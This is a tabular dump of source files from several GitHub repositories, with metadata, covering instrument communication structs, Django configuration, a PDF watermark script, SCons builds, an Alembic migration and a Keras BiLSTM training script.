blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
81e95253e7fc79ef1c6289862335413d5a76dbba | 7d38fb1baff08bb2f438f4b2c2972ef506bafcf9 | /cbi.py | 0923fc86360da717b7b2cb9bf4c1330cc7dafda5 | [] | no_license | rendinam/CBPM | a301eab02a9925782d02ecae99a2361a60646c4e | d3662f1279848da0bf8aea660ca8b062c3e47c17 | refs/heads/master | 2023-03-07T00:23:26.680674 | 2021-02-09T17:45:05 | 2021-02-09T17:45:05 | 337,477,219 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,502 | py | #----------------------------------------------
# Automatically generated python3 module code
# for core communication data structures.
#----------------------------------------------
from cbi_core import *
#---------------------------------------
# Necessary constants imported from
# header files.
#---------------------------------------
CBI_MAX_ERROR_WORDS = 4
CBI_MAX_TRACE_LEVELS = 15
CBI_MAX_DEBUG_WORDS = 660
#---------------------------------------
# Data type structures, used to compose
# various communication data structures.
#---------------------------------------
#---------------------------------------
# Communication data structure class
# definitions.
#---------------------------------------
class CMD(communication_struct):
    """Command structure: a command word, its status, an error-word
    array and a handshake word.  Field order defines the wire layout."""
    _fields_ = [('cmd', c_int),
                ('cmd_status', c_int),
                ('error', c_int*CBI_MAX_ERROR_WORDS),
                ('handshake', c_int)]

    def __init__(self, socketfd):
        # Offset of this structure in the instrument's communication table.
        self.table_offset = 1
        communication_struct.__init__(self, socketfd)
class STAT(communication_struct):
    """Status structure: state/status words plus an execution-trace
    array of up to CBI_MAX_TRACE_LEVELS entries."""
    _fields_ = [('state', c_int),
                ('status', c_int),
                ('num_levels', c_int),
                ('trace', c_int*CBI_MAX_TRACE_LEVELS)]

    def __init__(self, socketfd):
        # Offset of this structure in the instrument's communication table.
        self.table_offset = 2
        communication_struct.__init__(self, socketfd)
class DEBUG(communication_struct):
    """Debug structure: a write pointer into parallel circular buffers of
    debug words and the routine that produced each one."""
    _fields_ = [('write_ptr', c_int),
                ('debug', c_int*CBI_MAX_DEBUG_WORDS),
                ('routine', c_int*CBI_MAX_DEBUG_WORDS),
                ('padding', c_int)]

    def __init__(self, socketfd):
        # Offset of this structure in the instrument's communication table.
        self.table_offset = 3
        communication_struct.__init__(self, socketfd)
class IDENT(communication_struct):
    """Identification structure: network identity plus FPGA version
    words reported by the instrument."""
    _fields_ = [('ipaddr', c_char*16),
                ('hostname', c_char*28),
                ('module_type', c_int),
                ('fpga_maj', c_int),
                ('fpga_min', c_int),
                ('fe_fpga_id', c_int*4)]

    def __init__(self, socketfd):
        # Offset of this structure in the instrument's communication table.
        self.table_offset = 4
        communication_struct.__init__(self, socketfd)
class HEARTBEAT(communication_struct):
    """Heartbeat structure: liveness counter plus timing-integrity and
    turns-seen words."""
    _fields_ = [('heartbeat', c_int),
                ('timing_integrity', c_int),
                ('turns_seen', c_int)]

    def __init__(self, socketfd):
        # Offset of this structure in the instrument's communication table.
        self.table_offset = 5
        communication_struct.__init__(self, socketfd)
class MODULE_CONFIG(communication_struct):
    """Module configuration structure: executable, loader, build and
    hardware/firmware version information."""
    _fields_ = [('exe_type', c_int),
                ('exe_version', c_float),
                ('ldr_name', c_char*44),
                ('build_timestamp', c_int),
                ('core_comm_struct_rev', c_int),
                ('platform_comm_struct_rev', c_int),
                ('compiler_ver', c_int),
                ('lib_version', c_float),
                ('hardware_ver', c_int),
                ('firmware_ver', c_int)]

    def __init__(self, socketfd):
        # Offset of this structure in the instrument's communication table.
        self.table_offset = 6
        communication_struct.__init__(self, socketfd)
class instrument(instrument_base):
    """Provides for instantiation of all core
    instrumentation communication structures."""

    def __init__(self, host):
        instrument_base.__init__(self)
        self.hostname = host
        # Byte-encoded copy of the hostname for socket-level APIs.
        self.hostname_b = str.encode(host)
        # One instance of each core structure, all bound to the socket
        # descriptor set up by instrument_base.
        self.cmd = CMD(self.socketfd)
        self.stat = STAT(self.socketfd)
        self.debug = DEBUG(self.socketfd)
        self.ident = IDENT(self.socketfd)
        self.heartbeat = HEARTBEAT(self.socketfd)
        self.module_config = MODULE_CONFIG(self.socketfd)
| [
"matt.rendina@gmail.com"
] | matt.rendina@gmail.com |
96f235f5684df134779fb924924785ed85bf2164 | e7b30d912e69f7b1d6a6f774ae4573c06859af2d | /Htube/wsgi.py | a2a9de939e8a4b8789ff4e74879fef8dc28be112 | [] | no_license | haiderAli62/Htube-video-streaming-django | ff4f2eb3b1a204caa5920f741f8538a90f201f88 | 3400ddb9ae7689a329f2932c20e25f051ddc6be2 | refs/heads/master | 2020-06-15T05:09:42.340309 | 2019-07-04T09:59:24 | 2019-07-04T09:59:24 | 195,211,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | """
WSGI config for Htube project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os

from django.core.wsgi import get_wsgi_application

# Point Django at the project settings module before the app is built.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Htube.settings')

# Module-level WSGI callable used by application servers (gunicorn, mod_wsgi).
application = get_wsgi_application()
| [
"noreply@github.com"
] | noreply@github.com |
322b370d6d03d1c9bfafe46a87d7b9c8a55eaae6 | ce0f8956c4c308c67bd700d31fe8d5a17b16ac08 | /Python3/src/23 Miscellaneous Topics/PDF Manipulation/02_createWatermark.py | b055027b0fc51eb03efc7fb7e50e4af5484af4a7 | [] | no_license | seddon-software/python3 | 795ae8d22a172eea074b71d6cd49d79e388d8cc6 | d5e6db1509a25c1a3040d5ae82d757539a2ff730 | refs/heads/master | 2021-07-10T15:48:31.893757 | 2020-07-16T20:29:22 | 2020-07-16T20:29:22 | 175,872,757 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 554 | py | from reportlab.pdfgen import canvas
point = 10
inch = 72
TEXT = "watermark"
def make_pdf_file(output_filename):
    """Write a single-page, US-letter PDF containing the grey watermark
    text TEXT, rotated 45 degrees.

    output_filename: path of the PDF file to create.
    """
    page_width = 8.5 * inch
    page_height = 11 * inch
    grey = 0.9  # light grey fill so the watermark sits behind content
    c = canvas.Canvas(output_filename, pagesize=(page_width, page_height))
    c.setStrokeColorRGB(0, 0, 0)
    c.setFillColorRGB(grey, grey, grey)
    # NOTE(review): `point` is 10 above, so this is a 120pt font; a
    # typographic point is normally 1/72 inch — confirm the intent.
    c.setFont("Helvetica", 12 * point)
    # Rotate the coordinate system, then translate so the string lands
    # roughly mid-page along the diagonal.
    c.rotate(45)
    c.translate(page_width / 2, 0)
    c.drawString(-page_width / 8, 0, TEXT)
    c.showPage()
    c.save()
filename = "pdfs/watermark.pdf"
make_pdf_file(filename)
# Fix a Python 2 -> 3 conversion artifact: print(("Wrote", filename))
# printed the tuple "('Wrote', '...')"; pass the values separately.
print("Wrote", filename)
"seddon-software@keme.co.uk"
] | seddon-software@keme.co.uk |
86cf72e4ffc437f064a8671c622efbf1c3f9babd | 5c34abe10630b23da8ba7d1cbce38bda53a4b6fa | /RootIo/SConscript | b7f1d62057e6edcdd59cf22dde00c661fb1f03ec | [] | no_license | fermi-lat/GlastRelease-scons-old | cde76202f706b1c8edbf47b52ff46fe6204ee608 | 95f1daa22299272314025a350f0c6ef66eceda08 | refs/heads/master | 2021-07-23T02:41:48.198247 | 2017-05-09T17:27:58 | 2017-05-09T17:27:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,046 | # -*- python -*-
# $Header$
# Authors: Heather Kelly <heather@milkyway.gsfc.nasa.gov>, David Chamont <chamont@poly.in2p3.fr>
# Version: RootIo-26-01-03
# Pull shared build helpers from the parent SConstruct.
Import('baseEnv')
Import('listFiles')
Import('packages')

# Separate environment clones so program-only settings do not leak
# into the library build (and vice versa).
progEnv = baseEnv.Clone()
libEnv = baseEnv.Clone()

libEnv.Tool('addLinkDeps', package='RootIo', toBuild='component')
# Component (shared) library built from every source under src/.
RootIo =libEnv.ComponentLibrary('RootIo',
                                listFiles(['src/*.cxx']))

progEnv.Tool('RootIoLib')
# Windows-only preprocessor defines for the test program build.
if baseEnv['PLATFORM'] == 'win32':
    progEnv.AppendUnique(CPPDEFINES = ['GLEAM'])
    progEnv.AppendUnique(CPPDEFINES = ['__i386'])
    progEnv.AppendUnique(CPPDEFINES = ['EFC_FILTER'])
    progEnv.AppendUnique(CPPDEFINES = ['_WIN32'])

# Gaudi test application built from src/test/.
test_RootIo = progEnv.GaudiProgram('test_RootIo',
                                   listFiles(['src/test/*.cxx']), test = 1,
                                   package='RootIo')

# Register library, test app, public headers and job-options files
# with the package build system.
progEnv.Tool('registerTargets', package = 'RootIo',
             libraryCxts=[[RootIo,libEnv]],testAppCxts=[[test_RootIo,progEnv]],
             includes = listFiles(['RootIo/*.h']),
             jo = listFiles(['src/*.txt', 'src/test/*.txt']))
| [
""
] | ||
23946605d8fdc78913a7ec206ccf8d74fde4c824 | c9ce0cf9c193ebe35c31b39bba11d698a950bbf1 | /nico/test_nico.py | 384754e971255ba9dcd2e6bbf432961aff323068 | [] | no_license | KhlopotovAI/codewars-py | 93f89e3f62edd92acf76faa7ba212029206cc4f6 | 16a1eee25f35f7ccaead595e011963f0911dda4c | refs/heads/master | 2020-04-26T04:21:32.730010 | 2019-07-13T07:17:29 | 2019-07-13T07:17:29 | 173,299,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | from unittest import TestCase
from .kata import nico
class TestNico(TestCase):
    """Unit tests for the nico transposition-cipher kata."""

    def test_nico(self):
        # (key, message, expected-ciphertext) triples covering keys
        # shorter than, equal to, and longer than the message.
        cases = [
            ("crazy", "secretinformation", "cseerntiofarmit on "),
            ("abc", "abcd", "abcd "),
            ("ba", "1234567890", "2143658709"),
            ("a", "message", "message"),
            ("key", "key", "eky"),
            ("abcdefgh", "abcd", "abcd "),
        ]
        for key, message, expected in cases:
            self.assertEqual(expected, nico(key, message))
| [
"akhlopotov@list.ru"
] | akhlopotov@list.ru |
377669007b7547803f582137ed3be4c23f4a71d3 | f7b1bd000d9483343f915f057ac8e36a2de78334 | /experiment-2/BiDirectionalLSTM.py | cc69df9abe5f2ea80a07b3795efeb7b9a28f60fe | [] | no_license | spencergritton/Time-Series-Predictions | 511ded04f88e296eb4d30b98f58ac29c9d7e4668 | 76dcc7c61cd61b7c231796abee6ea5b3c4f870d8 | refs/heads/master | 2021-09-28T06:01:57.439727 | 2020-05-13T04:07:56 | 2020-05-13T04:07:56 | 251,520,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,916 | py | import os
import os.path
import numpy as np
from matplotlib import pyplot as plt
import matplotlib.patches as mpatches
import pickle
import time
import random
import pandas as pd
import tensorflow as tf
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import LSTM, Dense, Bidirectional, Input, Dropout, BatchNormalization, TimeDistributed
from tensorflow.keras.layers import Layer, InputSpec
from tensorflow.keras.callbacks import TensorBoard, TerminateOnNaN, ReduceLROnPlateau, EarlyStopping, ModelCheckpoint
from tensorflow.keras.optimizers import RMSprop, Adadelta
from tensorflow.keras import regularizers
# Set reproducible seed values to compare each experiment based on their
# outputs and not seed values.
# The below is necessary for starting Numpy generated random numbers
# in a well-defined initial state.
# https://keras.io/getting-started/faq/#how-can-i-obtain-reproducible-results-using-keras-during-development
tf.random.set_seed(33)
os.environ['PYTHONHASHSEED'] = str(33)
np.random.seed(33)
random.seed(33)

# Single-threaded TF session so op scheduling is deterministic run-to-run.
session_conf = tf.compat.v1.ConfigProto(
    intra_op_parallelism_threads=1,
    inter_op_parallelism_threads=1
)
sess = tf.compat.v1.Session(
    graph=tf.compat.v1.get_default_graph(),
    config=session_conf
)
tf.compat.v1.keras.backend.set_session(sess)
# Dataset
dataset = 'BTC_180_30'

# Open dataset from pickle file.  A context manager guarantees the file
# handle is closed even if unpickling raises.
with open(f"{dataset}.pickle", "rb") as pickle_in:
    data = pickle.load(pickle_in)
# Unpack the (train, test, parameters) triple produced by preprocessing.
train, test, parameters = data
trainX, trainY = train
testX, testY = test

# Model name (used for checkpoints, logs, plots and the results CSV).
model_name = 'BiDirectionalLSTM_BTC_180_30'

# Hyper params
DROPOUT = 0.5
EPOCHS = 100
BATCH_SIZE = 64
OPTIMIZER = Adadelta(learning_rate=1.0, rho=0.95)
# Human-readable copies of the optimizer/regularizer settings, recorded
# in the results CSV alongside the scores.
optimizer_str = 'Adadelta: learning_rate=1.0, rho=0.95'
REGULARIZATION = regularizers.l2(0.01)
regularization_str = 'l2: 0.01, output penalty "activity"'

# Dataset data: lengths of the input window and the prediction horizon.
INPUT_LEN = parameters['input_len']
OUTPUT_LEN = parameters['output_len']
standardization = parameters['standardization']
# Build the model: BiLSTM encoder -> dense hidden layer -> linear head
# that emits the whole OUTPUT_LEN-step forecast at once.
# Thanks to https://stackoverflow.com/questions/43034960/many-to-one-and-many-to-many-lstm-examples-in-keras
# for showing how to make a MANY TO MANY model in Keras
model = Sequential()
# NOTE(review): input_shape is passed to the inner LSTM rather than the
# Bidirectional wrapper; Keras usually expects it on the wrapper — confirm.
model.add( Bidirectional(LSTM(INPUT_LEN, input_shape=(trainX.shape[1:]), return_sequences=False, activity_regularizer=REGULARIZATION)) )
model.add( Dropout(DROPOUT) )
model.add( BatchNormalization() )
model.add( Dense(INPUT_LEN, activation='relu', activity_regularizer=REGULARIZATION) )
model.add( Dropout(DROPOUT) )
model.add( BatchNormalization() )
# Linear activation: raw regression outputs, one per forecast step.
model.add( Dense(OUTPUT_LEN, activation='linear') )

model.compile(loss="mse",
              optimizer=OPTIMIZER,
              metrics=['mae'])
# Time callback for tracking epoch training times, from: https://stackoverflow.com/questions/43178668/record-the-computation-time-for-each-epoch-in-keras-during-model-fit
class TimeHistory(tf.keras.callbacks.Callback):
    """Keras callback that records the wall-clock duration of every
    epoch in ``self.times`` (seconds, one entry per epoch)."""

    # Use logs=None instead of a mutable default dict ({}): mutable
    # defaults are shared across calls, and None matches the signature
    # used by tf.keras's own callbacks.
    def on_train_begin(self, logs=None):
        self.times = []

    def on_epoch_begin(self, epoch, logs=None):
        self.epoch_time_start = time.time()

    def on_epoch_end(self, epoch, logs=None):
        self.times.append(time.time() - self.epoch_time_start)
# Callbacks:
#  - stop on NaN loss, stop early after 6 stagnant epochs (restoring the
#    best weights), shrink the LR when val_loss plateaus, checkpoint the
#    best model, log to TensorBoard, and record per-epoch durations.
terminateOnNan = TerminateOnNaN()
earlyStopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=6, verbose=1, mode='min', baseline=None, restore_best_weights=True)
reduceOnPlateau = ReduceLROnPlateau(monitor='val_loss', factor=0.6, patience=2, min_lr=0.001)
modelCheckpoint = ModelCheckpoint(f'checkpoints/{model_name}.h5', monitor='loss', verbose=0, save_best_only=True, mode='min')
tensorboard = TensorBoard(log_dir=f'logs/{model_name}')
time_callback = TimeHistory()
# Train model; `history` keeps the per-epoch loss/metric/lr curves used
# by the plotting and CSV sections below.
history = model.fit(
    trainX, trainY,
    epochs=EPOCHS,
    validation_data=(testX, testY),
    batch_size=BATCH_SIZE,
    shuffle=True,
    callbacks=[
        terminateOnNan,
        earlyStopping,
        reduceOnPlateau,
        modelCheckpoint,
        tensorboard,
        time_callback
    ],
)
# Generate chart: train/val loss on the left axis, learning rate on a
# twin right axis, then save the figure under plots/.
# Using this as assistance:
# https://cmdlinetips.com/2019/10/how-to-make-a-plot-with-two-different-y-axis-in-python-with-matplotlib/
fig,ax=plt.subplots()

# Primary Axis Labels
ax.set_xlabel("Epochs")
ax.set_ylabel("Loss (MSE)")

# Primary axis data
ax.plot( history.history['loss'], color="orange" )
ax.plot( history.history['val_loss'], color="red" )

# Secondary axis data and labels
ax2=ax.twinx()
ax2.plot( history.history['lr'], color="blue" )
ax2.set_ylabel("Learning Rate" )

# Legend (manual patches because two axes are plotted separately)
loss_patch = mpatches.Patch(color='orange', label='Train Loss')
val_loss_patch = mpatches.Patch(color='red', label='Val Loss')
lr_patch = mpatches.Patch(color='blue', label='Learning Rate')
plt.legend(handles=[loss_patch, val_loss_patch, lr_patch])
plt.rcParams["legend.fontsize"] = 12
plt.title(model_name, loc='center')
plt.show()

# save the plot as a file
fig.savefig(f'plots/{model_name}.png', format='png', dpi=250, bbox_inches='tight')
# Store model data to csv for analysis.
filePath = 'ml-results.csv'
csvColumns = "Name,Val_Loss,Val_Mae,Epochs_Scheduled,Epochs_Ran,Training_Time(Mins),Input_Len,Output_Len,Batch_Size,Optimizer,Regularization,Dropout"

# Create the results file with a header row on first run; the context
# manager closes the handle even if the write fails.
if not os.path.isfile(filePath):
    with open(filePath, "a") as f:
        f.write(csvColumns)

df = pd.read_csv(filePath)
# Keep the columns in the canonical order defined above.
df = df[csvColumns.split(',')]

# Final evaluation on the held-out test set: [loss (MSE), MAE].
score = model.evaluate(testX, testY, verbose=0)
csvRow = {
    'Name': model_name, 'Val_Loss': score[0], 'Val_Mae': score[1],
    'Epochs_Scheduled': EPOCHS, 'Epochs_Ran': len(history.history['loss']),
    'Training_Time(Mins)': sum(time_callback.times)/60, 'Input_Len': INPUT_LEN, 'Output_Len': OUTPUT_LEN,
    'Batch_Size': BATCH_SIZE, 'Optimizer': optimizer_str, 'Regularization': regularization_str,
    'Dropout': DROPOUT
}
# DataFrame.append() was deprecated in pandas 1.4 and removed in 2.0;
# pd.concat with a one-row frame is the supported equivalent.
df = pd.concat([df, pd.DataFrame([csvRow])], ignore_index=True)
df.to_csv(path_or_buf=filePath, index=False)
print('model-results.csv updated')
"SpencerGritton@Spencers-MBP.lan"
] | SpencerGritton@Spencers-MBP.lan |
03b2064a1b169b166d88744f2437bf69ef5cbf8d | c7e37db2fb70358d8ad178efa0a2862161ef1af4 | /backend/migrations/versions/522c2917c182_.py | fa4ddf2deb33dd7ea6d5cc72a5992aaabd1e84c4 | [
"MIT"
] | permissive | JohnDamilola/URL-Shortener-2.0 | 9ef2b5af096b842f0d1763a143bf840908c98c82 | 7413928b7de6acb0230c09e5d3eaa748ebb6287b | refs/heads/main | 2023-04-14T00:09:41.708237 | 2022-12-06T03:04:01 | 2022-12-06T03:04:01 | 561,389,222 | 1 | 1 | MIT | 2022-12-04T20:09:51 | 2022-11-03T15:29:17 | TypeScript | UTF-8 | Python | false | false | 1,865 | py | """empty message
Revision ID: 522c2917c182
Revises: ca5354b4cc9e
Create Date: 2022-11-23 12:52:31.176215
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '522c2917c182'
down_revision = 'ca5354b4cc9e'
branch_labels = None
depends_on = None
def upgrade():
    """Create the `links` table: a shortened URL ("stub") with UTM
    tracking fields, optional password/expiry, owned by a user."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('links',
        sa.Column('id', postgresql.UUID(as_uuid=True), nullable=False),
        # `stub` is the short-link path segment; uniqueness enforced below.
        sa.Column('stub', sa.String(length=100), nullable=False),
        # 2083 = the common maximum URL length (IE limit convention).
        sa.Column('long_url', sa.String(length=2083), nullable=False),
        sa.Column('title', sa.String(length=100), nullable=False),
        sa.Column('disabled', sa.Boolean(), nullable=False),
        # Optional UTM campaign-tracking parameters appended on redirect.
        sa.Column('utm_source', sa.String(length=100), nullable=True),
        sa.Column('utm_medium', sa.String(length=100), nullable=True),
        sa.Column('utm_campaign', sa.String(length=100), nullable=True),
        sa.Column('utm_term', sa.String(length=100), nullable=True),
        sa.Column('utm_content', sa.String(length=100), nullable=True),
        # Hash of the optional link password (nullable = unprotected link).
        sa.Column('password_hash', sa.String(), nullable=True),
        sa.Column('expire_on', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True),
        sa.Column('created_on', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=False),
        sa.Column('updated_on', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=False),
        sa.Column('user_id', postgresql.UUID(as_uuid=True), nullable=True),
        sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
        sa.PrimaryKeyConstraint('id'),
        sa.UniqueConstraint('stub')
    )
    # ### end Alembic commands ###
def downgrade():
    """Revert this migration by dropping the `links` table."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_table('links')
    # ### end Alembic commands ###
| [
"johndamilola03@gmail.com"
] | johndamilola03@gmail.com |
3d98ad2af60c8f5391c53f249b2be5d49e4a5712 | 28df46f33feb507577e41f1140334d27f14f510c | /forgerock-auth-filters/branches/1.3/forgerock-authn-filter/forgerock-jaspi-robot-tests/variables.py | 564207c3a023a5345207442a7d10072b5d4d1b10 | [] | no_license | deepakchanalia/forgerock-commons | 3dc5c0ac6c541ac2f5fbbe8fdf79b21e90bc8a5e | dd83127c17428e9397a568b3eaac46a72d1aa087 | refs/heads/master | 2021-01-11T21:00:12.193770 | 2015-07-23T22:46:14 | 2015-07-23T22:46:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,118 | py | ###########################
# MANDATORY CUSTOMISATION #
###########################
# location of JASPI runtime jar
JASPI_TEST_SERVER_WAR_PATH = '/Users/Phill/ForgeRockDev/tmp-old-repos/forgerock-commons-auth-filters-1.3.0/forgerock-commons-auth-filters-1.3.0/forgerock-authn-filter/forgerock-jaspi-test-server/target/jaspi.war'
# location of apache tomcat directory
TOMCAT_ZIP_PATH = '/Users/Phill/ForgeRockDev/tmp-old-repos/forgerock-commons-auth-filters-1.3.0/forgerock-commons-auth-filters-1.3.0/forgerock-authn-filter/forgerock-jaspi-robot-tests/resources/apache-tomcat-6.0.37.zip'
# location of the
DEPLOY_PATH = '/Users/Phill/ForgeRockDev/tmp-old-repos/forgerock-commons-auth-filters-1.3.0/forgerock-commons-auth-filters-1.3.0/forgerock-authn-filter/forgerock-jaspi-robot-tests/deploy'
##############################
# OPTIONAL CUSTOMISATION #
# DEFAULT VALUES CAN BE USED #
##############################
# location of empty exploded war directory
#EXPLODED_WAR_PATH = '/Users/Phill/ForgeRockDev/commons/forgerock-auth-filters-robot/forgerock-auth-filters-robot/templates/exploded-war'
DEBUG = 'true' | [
"phillcunnington@ca16bcf9-9eb2-46e4-97b8-9b07c30c95dc"
] | phillcunnington@ca16bcf9-9eb2-46e4-97b8-9b07c30c95dc |
c7a04b037644a21f6b2eb0ec0be6fbe5139ab9fe | d029f315bc22fd48566df819ec8f5e28b2c11cbc | /wave_app/uploader/urls.py | 59824ba2cbae2ad55ab4547d4731a1136450c775 | [] | no_license | Onjrew/se-challenge | 35a9fbc7a05d39c9a2460a00bc32047beed9c420 | c18e46a7198511c9bc1ddc40c9b80e772bd15287 | refs/heads/master | 2020-06-12T16:03:03.294338 | 2016-12-07T03:31:48 | 2016-12-07T03:31:48 | 75,795,894 | 0 | 0 | null | 2016-12-07T03:32:45 | 2016-12-07T03:32:45 | null | UTF-8 | Python | false | false | 299 | py | from django.conf.urls import url
from . import views
# URL namespace, e.g. reverse('uploader:index').
app_name = 'uploader'

urlpatterns = [
    url(r'^$', views.index, name='index'),                # landing page
    url(r'^upload', views.upload, name='upload'),         # CSV upload form/handler
    url(r'^totals', views.totals, name='totals'),         # aggregated totals view
    url(r'^parse_csv', views.parse_csv, name='parse_csv'),
]
| [
"andrew.scott.ferguson@gmail.com"
] | andrew.scott.ferguson@gmail.com |
93fcbf474fda2d35b532f00d1d4261cb7d961531 | 145c9faee52e69f1f7b1cf6b9ac84facf7819911 | /userSorter/user_file_builder.py | faa2b4a28e1e66eb4218d67769ca900d976cb69a | [] | no_license | zafodB/HealthData | 63ddde8efa6e6ceb2f924502b6eb714381d4e935 | 2359b9997816c6b5ae39879641e99eb0c09384be | refs/heads/master | 2022-04-04T18:05:43.394547 | 2020-01-29T20:07:54 | 2020-01-29T20:07:54 | 201,798,022 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,096 | py | '''
Structure:
{
"username":"someone",
"url":"123465",
"status":"very eHealthy"
"weburl": "http://..."
"posts":{
"342823":{
"date":"23-11-2011",
"title":"pregnancy problem",
"text":"this is a sample post",
"category":"pregnancy",
"status":"newPost"
},
"342887":{
"date":"24-11-2011",
"title":"my child is sick",
"text":"this is another post",
"category":"child health",
"status":"reply"
}
},
}
'''
import json, os
import datetime
from dateutil.parser import *
# Source shards of pre-sorted thread JSON files to process.
starting_directories = []
starting_directories.append("/scratch/GW/pool0/fadamik/healthboards/sorted/2/")
starting_directories.append("/scratch/GW/pool0/fadamik/healthboards/sorted/3/")
starting_directories.append("/scratch/GW/pool0/fadamik/healthboards/sorted/4/")
starting_directories.append("/scratch/GW/pool0/fadamik/healthboards/sorted/5/")

# starting_directory = "D:/Downloads/json/healthboards/" + "6/"
# output_directory = "D:/Downloads/json/healthboards/" + "6-sorted/"
# Destination root for the per-user JSON files (sharded sub-folders).
output_directory = "/scratch/GW/pool0/fadamik/healthboards/users/"

# if not os.path.isdir(output_directory):
#     os.mkdir(output_directory)
def write_out_users(users):
    """Merge each user's accumulated record into its JSON file on disk.

    Files live under output_directory, sharded into sub-folders by
    user // 100 (assumes user ids are integers — see process_files).
    Existing files are read first and updated, so records accumulate
    across batches; dict.update() overwrites top-level keys that clash.
    """
    for user in users:
        shard_dir = os.path.join(output_directory, str(user // 100))
        # exist_ok avoids the isdir/mkdir race when several workers run.
        os.makedirs(shard_dir, exist_ok=True)

        full_path = os.path.join(shard_dir, str(user) + ".json")

        user_file_json = {}
        if os.path.exists(full_path):
            # Context managers close the handle even if parsing fails.
            with open(full_path, "r", encoding="utf8") as user_file:
                user_file_json = json.load(user_file)

        user_file_json.update(users[user])

        with open(full_path, "w", encoding="utf8") as user_file:
            json.dump(user_file_json, user_file)

    return None
def process_files(starting_directory):
    """Walk `starting_directory`, parse every thread JSON file, and build
    per-user activity records, flushing to disk every 1000 files.

    Each thread file contributes one activity entry per answer that has a
    'description'; activity ids are docid*10 + answer number.
    """
    processed_files = 0
    users = {}

    for root, dirs, files in os.walk(starting_directory):
        for file_name in files:
            try:
                file = open(os.path.join(root, file_name), "r", encoding="utf8")
                contents = file.read()
                file_as_json = json.loads(contents)
                file.close()

                # Base for activity ids; answers are numbered from 1.
                document_id = file_as_json['docid'] * 10
                category = file_as_json['commonCategory']
                title = file_as_json['title']

                original_poster_id = file_as_json['createdBy']['url']
                # NOTE(review): this assignment replaces any record this
                # user accumulated from earlier files in the current
                # batch (including its 'activity' dict) — confirm intent.
                users[original_poster_id] = {'name': file_as_json['createdBy']['name'],
                                             'status': file_as_json['createdBy']['status']}

                answer_nr = 1
                for answer in file_as_json['answers']:
                    activity_nr = document_id + answer_nr

                    # Answers without text are skipped; answer_nr is NOT
                    # advanced, so the next textual answer takes its slot.
                    if 'description' not in answer:
                        continue

                    if answer_nr == 1:
                        # First answer is the thread-opening post by the OP.
                        users[original_poster_id]['activity'] = {activity_nr: {}}
                        users[original_poster_id]['activity'][activity_nr]['title'] = title
                        users[original_poster_id]['activity'][activity_nr]['description'] = answer['description']
                        users[original_poster_id]['activity'][activity_nr]['pubDate'] = parse(answer['pubDate']).isoformat()
                        users[original_poster_id]['activity'][activity_nr]['category'] = category
                        users[original_poster_id]['activity'][activity_nr]['newPost'] = True
                    else:
                        user_id = answer['createdBy']['url']
                        if user_id not in users:
                            users[user_id] = {'name': answer['createdBy']['name'], 'status': answer['createdBy']['status'],
                                              'activity': {activity_nr: {}}}
                        else:
                            # NOTE(review): assumes the existing record has an
                            # 'activity' key; an OP whose opening post was
                            # skipped would not — potential KeyError. Confirm.
                            users[user_id]['activity'][activity_nr] = {}

                        users[user_id]['activity'][activity_nr]['title'] = title
                        users[user_id]['activity'][activity_nr]['description'] = answer['description']
                        # Replies carry no parsed timestamp in this format.
                        users[user_id]['activity'][activity_nr]['pubDate'] = None
                        users[user_id]['activity'][activity_nr]['category'] = category
                        users[user_id]['activity'][activity_nr]['newPost'] = False

                    answer_nr += 1

                processed_files += 1
                if processed_files % 1000 == 0:
                    print("Processed files: " + str(processed_files))
                    # Flush the batch to disk and start a fresh dict to
                    # bound memory use.
                    write_out_users(users)
                    users = {}
                    # print(users)

            except Exception as e:
                print("Error processing file: " + file_name + ": " + str(e))

    # Flush whatever remains after the final (partial) batch.
    if users:
        write_out_users(users)
# Process every source shard sequentially.
for directory in starting_directories:
    process_files(directory)
| [
"filiplama@gmail.com"
] | filiplama@gmail.com |
b2a671dfca5e7fc447b993c10a529875dc54603f | c7061fb106b801c12fb40ff331d927a5bb24da80 | /BasicExerciseAndKnowledge/w3cschool/n16_format_datetime.py | b0f4e62a46fdd8c480a544be789ecdafb00a1d3a | [
"MIT"
] | permissive | Jonathan1214/learn-python | 34e6b5612beeb1a46b5964b0a4e306656355fe84 | 19d0299b30e953069f19402bff5c464c4d5580be | refs/heads/master | 2020-03-27T09:03:16.785034 | 2018-08-31T02:48:34 | 2018-08-31T02:48:34 | 146,310,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | #coding:utf-8
